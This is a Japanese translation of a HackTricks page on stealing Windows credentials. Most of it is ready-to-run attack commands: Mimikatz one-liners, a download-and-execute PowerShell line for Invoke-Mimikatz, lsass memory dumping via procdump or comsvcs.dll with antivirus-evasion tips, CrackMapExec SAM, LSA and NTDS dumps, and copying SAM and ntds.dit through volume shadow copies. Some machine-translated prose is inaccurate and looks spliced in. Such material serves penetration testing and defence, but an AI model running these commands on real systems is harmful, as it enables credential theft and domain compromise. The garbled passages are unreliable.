.. | ||
credentials-mimikatz.md | ||
credentials-protections.md | ||
README.md |
Windowsの資格情報の盗み出し
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
HackenProofをフォロー して、web3のバグについてもっと学びましょう
🐞 web3のバグチュートリアルを読む
🔔 新しいバグ報奨金について通知を受ける
💬 コミュニティのディスカッションに参加する
Mimikatzによる資格情報の模倣
#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"
他のMimikatzができることについては、このページを参照してください。
Invoke-Mimikatz
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
ここでいくつかの可能な資格情報の保護方法について学びましょう。 これらの保護方法は、Mimikatzが一部の資格情報を抽出するのを防ぐことができます。
Meterpreterを使用した資格情報
被害者の中にあるパスワードとハッシュを検索するために、Credentials Plugin **を使用してください。**私が作成したものです。
#Credentials from SAM
post/windows/gather/smart_hashdump
hashdump
#Using kiwi module
load kiwi
creds_all
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"
#Using Mimikatz module
load mimikatz
mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::lsa /inject"
mimikatz_command -f "lsadump::sam"
AV回避
Procdump + Mimikatz
SysInternalsのProcdumpは、Microsoftの正規ツールであるため、Defenderに検出されません。
このツールを使用して、lsassプロセスをダンプし、ダンプをダウンロードして、ダンプからローカルにクレデンシャルを抽出することができます。
{% code title="lsassのダンプ" %}
#Local
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#Remote, mount https://live.sysinternals.com which contains procdump.exe
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
{% code title="ダンプから資格情報を抽出する" %}
//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords
{% endcode %}
このプロセスは、SprayKatzを使用して自動的に行われます:./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24
注意: 一部のAVは、procdump.exeを使用してlsass.exeをダンプすることを悪意のあるものとして検出する場合があります。これは、彼らが**"procdump.exe"と"lsass.exe"という文字列を検出しているためです。そのため、lsass.exeの名前の代わりに、lsass.exeのPIDをprocdumpに引数として渡すことがステルス**です。
comsvcs.dllを使用してlsassをダンプする
C:\Windows\System32
にあるcomsvcs.dllというDLLは、プロセスがクラッシュするときにプロセスメモリをダンプする役割を持っています。このDLLには、rundll32.exe
で呼び出すことができる**MiniDumpW
という関数が含まれています。
最初の2つの引数は使用されませんが、3番目の引数は3つの部分に分割されます。最初の部分はダンプされるプロセスのID、2番目の部分はダンプファイルの場所、3番目の部分はfullという単語です。他の選択肢はありません。
これらの3つの引数が解析されると、基本的にこのDLLはダンプファイルを作成し、指定したプロセスをそのダンプファイルにダンプします。
この関数のおかげで、procdumpをアップロードして実行する代わりに、lsassプロセスをダンプするためにcomsvcs.dll**を使用することができます。(この情報はhttps://en.hackndo.com/remote-lsass-dump-passwords/から抽出されました)
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
この技術はSYSTEMとしてのみ実行できることを念頭に置いておく必要があります。
**lssasy**を使用して、このプロセスを自動化することができます。
タスクマネージャを使用してlsassをダンプする
- タスクバーを右クリックし、タスクマネージャをクリックします。
- 「詳細」をクリックします。
- プロセスタブで「Local Security Authority Process」プロセスを検索します。
- 「Local Security Authority Process」プロセスを右クリックし、「ダンプファイルの作成」をクリックします。
procdumpを使用してlsassをダンプする
Procdumpは、sysinternalsスイートの一部である、Microsoftによって署名されたバイナリです。
Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp
CrackMapExec
SAMハッシュのダンプ
CrackMapExecは、Windowsシステムでの認証情報の収集に使用される強力なツールです。このツールを使用すると、SAMデータベースからユーザーのハッシュをダンプすることができます。
以下のコマンドを使用して、CrackMapExecを使用してSAMハッシュをダンプする方法を学びましょう。
crackmapexec <target> -u <username> -p <password> --sam
このコマンドでは、<target>
にはターゲットのIPアドレスまたはホスト名を指定し、<username>
と<password>
には有効な認証情報を入力します。--sam
フラグを使用することで、SAMハッシュのダンプが有効になります。
CrackMapExecは、リモートで実行されるため、ターゲットシステムへのアクセス権が必要です。また、実行するユーザーには適切な特権が必要です。
この方法を使用すると、Windowsシステムでの認証情報の収集が容易になります。ただし、合法的な目的のためにのみ使用してください。
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
LSAシークレットのダンプ
LSA(Local Security Authority)シークレットは、Windowsシステムで保存される重要な認証情報です。これには、ユーザーのパスワードや暗号化キーなどが含まれます。ハッカーは、LSAシークレットをダンプすることで、これらの機密情報を盗むことができます。
以下の手順を使用して、LSAシークレットをダンプすることができます。
-
ハッカーは、システムにアクセスするための特権を取得する必要があります。これには、管理者権限の取得やシステムへの侵入が含まれます。
-
ハッカーは、ダンプツールを使用してLSAシークレットを取得します。一般的なツールには、MimikatzやGsecdumpなどがあります。
-
ハッカーは、ダンプされたLSAシークレットを解析して、含まれる認証情報を取得します。これには、ユーザーのパスワードや暗号化キーなどが含まれます。
LSAシークレットのダンプは、ハッカーによる悪意のある活動に使用される可能性があります。したがって、システムのセキュリティを強化するためには、適切なセキュリティ対策を実施することが重要です。
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
ターゲットDCからNTDS.ditをダンプする
NTDS.dit```は、Active Directoryデータベースファイルであり、ユーザーの認証情報を含んでいます。このファイルをダンプすることで、ユーザーの資格情報を取得することができます。
以下の手順に従って、ターゲットDCからNTDS.ditをダンプします。
1. リモートデスクトップまたはSSHを使用して、ターゲットDCに接続します。
2. 必要な特権を取得するために、適切なユーザーアカウントを使用します。
3. コマンドプロンプトまたはPowerShellを開きます。
4. NTDS.ditをダンプするためのツールを使用します。一般的なツールには、`ntdsutil`や`mimikatz`があります。
5. ツールを使用して、NTDS.ditをダンプします。ダンプされたファイルは、ローカルマシンに保存されます。
以上の手順に従うことで、ターゲットDCからNTDS.ditをダンプすることができます。このダンプファイルには、ユーザーの資格情報が含まれているため、慎重に取り扱ってください。
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
### ターゲットDCからNTDS.ditのパスワード履歴をダンプする
```plaintext
1. Mimikatzを使用して、ターゲットDCにアクセスします。
2. `lsadump::lsa /inject`コマンドを実行して、LSAプロセスにインジェクションします。
3. `lsadump::dcsync /domain:<domain_name> /all /csv`コマンドを実行して、NTDS.ditのパスワード履歴をダンプします。
4. ダンプされたファイルには、ユーザーのパスワードハッシュが含まれています。
この手順に従って、ターゲットDCからNTDS.ditのパスワード履歴をダンプすることができます。ダンプされたファイルには、ユーザーのパスワードハッシュが含まれています。
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
各NTDS.ditアカウントのpwdLastSet属性を表示する
To show the pwdLastSet
attribute for each NTDS.dit account, you can use the following command:
Get-ADUser -Filter * -Properties pwdLastSet | Select-Object Name, pwdLastSet
This command will retrieve all user accounts from the NTDS.dit database and display the Name
and pwdLastSet
attributes for each account.
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
HackenProofをフォロー して、web3のバグについてもっと学びましょう
🐞 web3のバグチュートリアルを読む
🔔 新しいバグ報奨金について通知を受ける
💬 コミュニティディスカッションに参加する
SAMとSYSTEMの盗み出し
これらのファイルは_C:\windows\system32\config\SAM_と_C:\windows\system32\config\SYSTEM_に配置されているはずです。しかし、通常の方法では単にコピーすることはできません。なぜなら、これらのファイルは保護されているからです。
レジストリから
これらのファイルを盗み出す最も簡単な方法は、レジストリからコピーすることです:
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Kaliマシンにこれらのファイルをダウンロードし、次のコマンドを使用してハッシュを抽出します:
samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL
ボリューム シャドウ コピー
このサービスを使用して、保護されたファイルのコピーを作成できます。管理者である必要があります。
vssadmin の使用
vssadmin バイナリは Windows Server バージョンのみで利用可能です。
vssadmin create shadow /for=C:
#Copy SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SAM
#Copy SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
#Copy ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
# You can also create a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
しかし、同じことをPowershellからも行うことができます。以下は、SAMファイルをコピーする方法の例です(使用するハードドライブは「C:」で、C:\ users \ Publicに保存されます)。ただし、これは保護されたファイルをコピーするために使用できます。
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
$voume.Delete();if($notrunning -eq 1){$service.Stop()}
コードの本文:https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html
Invoke-NinjaCopy
最後に、PSスクリプトInvoke-NinjaCopyを使用して、SAM、SYSTEM、およびntds.ditのコピーを作成することもできます。
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
Active Directoryの資格情報 - NTDS.dit
Ntds.ditファイルは、Active Directoryのデータを格納するデータベースです。ユーザーオブジェクト、グループ、およびグループのメンバーシップに関する情報を含みます。また、ドメイン内のすべてのユーザーのパスワードハッシュも含まれています。
重要なNTDS.ditファイルは、次の場所にあります: %SystemRoom%/NTDS/ntds.dit
このファイルは、Extensible Storage Engine(ESE)と呼ばれるデータベースであり、公式には3つのテーブルで構成されています:
- データテーブル:オブジェクト(ユーザー、グループなど)に関する情報を含みます。
- リンクテーブル:関係(所属しているなど)に関する情報を含みます。
- SDテーブル:各オブジェクトのセキュリティ記述子を含みます。
詳細については、http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/を参照してください。
Windowsは_Ntdsa.dll_を使用してそのファイルとやり取りし、_lsass.exe_によって使用されます。そのため、NTDS.ditファイルの一部は、lsass
メモリの内部に配置される可能性があります(おそらくパフォーマンスの向上のためにキャッシュが使用されるため、最新にアクセスされたデータを見つけることができます)。
NTDS.dit内のハッシュの復号化
ハッシュは3回暗号化されます:
- BOOTKEYとRC4を使用して、パスワード暗号化キー(PEK)を復号化します。
- PEKとRC4を使用して、ハッシュを復号化します。
- DESを使用して、ハッシュを復号化します。
PEKは、すべてのドメインコントローラーで同じ値を持っていますが、NTDS.ditファイル内でドメインコントローラーのSYSTEMファイルのBOOTKEYを使用して暗号化されています(ドメインコントローラー間で異なります)。これが、NTDS.ditファイルから資格情報を取得するためには、NTDS.ditファイルとSYSTEMファイル(C:\Windows\System32\config\SYSTEM)の両方が必要な理由です。
Ntdsutilを使用してNTDS.ditをコピーする
Windows Server 2008以降で利用可能です。
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
ボリュームシャドウコピートリックを使用して、ntds.ditファイルをコピーすることもできます。SYSTEMファイルのコピーも必要です(再び、レジストリからダンプするか、ボリュームシャドウコピートリックを使用してください)。
NTDS.ditからハッシュを抽出する
NTDS.ditとSYSTEMのファイルを取得したら、_secretsdump.py_などのツールを使用してハッシュを抽出できます。
secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
有効なドメイン管理者ユーザーを使用して、それらを自動的に抽出することもできます:
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
大きなNTDS.ditファイルの場合、gosecretsdumpを使用して抽出することをおすすめします。
最後に、メタスプロイトモジュール _post/windows/gather/credentials/domain_hashdump_
またはmimikatz lsadump::lsa /inject
を使用することもできます。
NTDS.ditからドメインオブジェクトをSQLiteデータベースに抽出する
NTDSオブジェクトは、ntdsdotsqliteを使用してSQLiteデータベースに抽出することができます。秘密情報だけでなく、生のNTDS.ditファイルが既に取得されている場合に、さらなる情報抽出のためにオブジェクト全体とその属性も抽出されます。
ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
SYSTEM
ハイブはオプションですが、シークレットの復号化(NTハッシュ、LMハッシュ、クリアテキストパスワード、Kerberosまたは信頼キー、NTハッシュ、LMハッシュのパスワード履歴などの補足資格情報)を許可します。他の情報と共に、以下のデータが抽出されます:ユーザーアカウントとマシンアカウントとそれらのハッシュ、UACフラグ、最後のログオンとパスワード変更のタイムスタンプ、アカウントの説明、名前、UPN、SPN、グループと再帰的なメンバーシップ、組織単位ツリーとメンバーシップ、信頼されたドメインとその信頼のタイプ、方向、属性...
Lazagne
ここからバイナリをダウンロードします。このバイナリを使用して、さまざまなソフトウェアから資格情報を抽出できます。
lazagne.exe all
SAMとLSASSから資格情報を抽出するための他のツール
Windows credentials Editor (WCE)
このツールはメモリから資格情報を抽出するために使用できます。以下からダウンロードしてください:http://www.ampliasecurity.com/research/windows-credentials-editor/
fgdump
SAMファイルから資格情報を抽出します。
You can find this binary inside Kali, just do: locate fgdump.exe
fgdump.exe
PwDump
SAMファイルから資格情報を抽出します。
You can find this binary inside Kali, just do: locate pwdump.exe
PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump
PwDump7
ここからダウンロードして、単に実行するだけでパスワードが抽出されます。
防御策
HackenProofをフォロー して、web3のバグについてさらに学びましょう
🐞 web3のバグチュートリアルを読む
🔔 新しいバグバウンティについて通知を受ける
💬 コミュニティディスカッションに参加する
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを発見しましょう、私たちの独占的なNFTのコレクション
- 公式のPEASS&HackTricksのグッズを手に入れましょう
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローする🐦@carlospolopm.
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。